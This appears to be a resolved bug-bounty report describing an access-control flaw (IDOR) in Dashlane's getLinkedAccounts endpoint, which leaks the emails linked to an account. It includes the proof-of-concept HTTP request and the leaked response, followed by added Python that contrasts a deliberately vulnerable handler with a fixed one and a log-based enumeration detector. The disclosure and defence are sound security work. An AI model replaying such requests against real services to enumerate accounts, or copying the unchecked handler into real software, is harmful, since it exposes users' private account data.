Missing Access Control (IDOR) To Know Linked Accounts
Unknown
Vulnerability Details
Hello Team,
While digging into your application I came across an endpoint where I was able to check whether an email has been used in multiple accounts or not, and emails are also getting leaked.
You have a feature to enter an email to get a token:
{F105969}
As you can see from the above screenshot, I'm logged in as ([email protected]) and I put the email ([email protected]) for getting codes, which means I have linked my account into another account.
---------------------------------------------------------------------------------------------------------------------------------------
Your endpoint request:
POST /1/account/getLinkedAccounts HTTP/1.1
Host: www.dashlane.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://www.dashlane.com/business/try
Content-Length: 31
Cookie:
Connection: close
[email protected]
----------------------------------------------------------------------------------------------------------------
Response:
{"code":200,"message":"OK","content":{"logins":["[email protected]","[email protected]","[email protected]"]}}
------------------------------------------------------------------------------------------------------------------
From the above response you can see into which accounts the email has been linked.
{F105970}
Thanks!
Best,
Arbaz
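An added illustration of the ownership check the endpoint above is missing, written for this page and not taken from the report or from Dashlane's code. The user table, session object, handler functions and the access-log format are all constructed assumptions; the vulnerable handler mirrors the reported behaviour (lookup key taken from the request body), the fixed handler derives the key from the authenticated session, and a small log heuristic shows how enumeration of the unfixed endpoint would stand out.

```python
"""Added illustration of the missing ownership check behind
/1/account/getLinkedAccounts. The data, session model and log format are
constructed for this example; none of this is Dashlane's code."""
from dataclasses import dataclass
from collections import defaultdict
import re

# Constructed sample data: the logins linked to each account.
LINKED_LOGINS = {
    "alice@example.com": ["alice@example.com", "alice.work@example.com"],
    "bob@example.com": ["bob@example.com", "bob.old@example.com"],
}


@dataclass
class Session:
    """Identity established when the caller authenticated (assumed model)."""
    login: str


def get_linked_accounts_vulnerable(session: Session, requested_login: str) -> dict:
    """Mirrors the report: the lookup key is taken from the request body,
    so any authenticated caller can enumerate another login's accounts and
    learn whether an email is registered at all."""
    logins = LINKED_LOGINS.get(requested_login)
    if logins is None:
        return {"code": 404, "message": "Unknown login"}
    return {"code": 200, "message": "OK", "content": {"logins": logins}}


def get_linked_accounts_fixed(session: Session, requested_login: str) -> dict:
    """Hardened: the only login a caller may query is their own. The check
    runs before any lookup, so a foreign login gets the same 403 whether or
    not it exists, which also removes the email-enumeration signal."""
    if requested_login != session.login:
        return {"code": 403, "message": "Forbidden"}
    logins = LINKED_LOGINS.get(session.login, [session.login])
    return {"code": 200, "message": "OK", "content": {"logins": logins}}


# Constructed access-log lines in a made-up format: one request per line.
SAMPLE_LOG = """\
2016-07-20T10:00:01Z session=s1 POST /1/account/getLinkedAccounts login=alice@example.com
2016-07-20T10:00:05Z session=s2 POST /1/account/getLinkedAccounts login=bob@example.com
2016-07-20T10:00:06Z session=s2 POST /1/account/getLinkedAccounts login=carol@example.com
2016-07-20T10:00:07Z session=s2 POST /1/account/getLinkedAccounts login=dave@example.com
2016-07-20T10:00:08Z session=s2 POST /1/account/getLinkedAccounts login=erin@example.com
2016-07-20T10:00:09Z session=s2 POST /1/account/getLinkedAccounts login=frank@example.com
"""

LOG_RE = re.compile(
    r"session=(?P<session>\S+) POST /1/account/getLinkedAccounts login=(?P<login>\S+)"
)


def sessions_enumerating_logins(log_text: str, threshold: int = 3) -> dict:
    """Detection heuristic for logs from before the fix: a legitimate caller
    queries one login (their own), so a session that queries many distinct
    logins is enumerating. Returns {session: distinct-login-count} for
    sessions at or above the threshold."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m:
            seen[m["session"]].add(m["login"])
    return {s: len(v) for s, v in seen.items() if len(v) >= threshold}


if __name__ == "__main__":
    caller = Session(login="alice@example.com")
    print(get_linked_accounts_vulnerable(caller, "bob@example.com"))  # leaks bob's logins
    print(get_linked_accounts_fixed(caller, "bob@example.com"))       # 403
    print(sessions_enumerating_logins(SAMPLE_LOG))                    # {'s2': 5}
```

The design point is that the client-supplied email is never trusted as an authorization key: the fixed handler compares it against the session identity before touching the data store, and answers every foreign login identically so the response cannot double as an "is this email registered?" oracle.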
Report Stats
- Report ID: 152407
- State: Closed
- Substate: resolved
- Upvotes: 20